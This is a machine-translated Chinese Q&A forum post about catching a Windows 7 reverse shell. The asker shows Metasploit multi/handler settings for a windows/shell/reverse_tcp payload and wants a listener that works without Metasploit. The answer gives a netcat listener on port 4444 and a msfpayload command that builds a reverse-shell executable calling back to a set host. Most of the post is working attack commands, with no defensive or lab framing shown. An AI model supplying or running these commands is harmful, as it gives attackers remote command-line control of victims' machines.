抱歉我的英文。 使用metasploit我使用windows / shell / reverse_tcp有效负载为windows 7生成了一个漏洞。 然后我使用msfconsole等待连接:
use exploit/multi/handler
set PAYLOAD windows/shell/reverse_tcp
set LHOST 192.168.182.129
set LPORT 4444
exploit
我已成功连接到Windows的命令行。 但是我需要在不使用metasploit的情况下进行连接。我找到了如何创建独立模块,但它只是用于漏洞利用。 我需要独立的多/处理程序reverse_tcp或只是侦听某个端口的代码,然后才能访问命令行。
答案 0 :(得分:0)
我真的不知道你的约束/限制是什么
我的猜测是,你希望在没有安装metasploit的计算机上“接收shell”。
如果是这种情况,你可以使用 msfd ( metasploit守护进程安装在不同的计算机上)或简单的netcat,socat,...
您如何看待这一点:
# nc -l -p 4444
# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe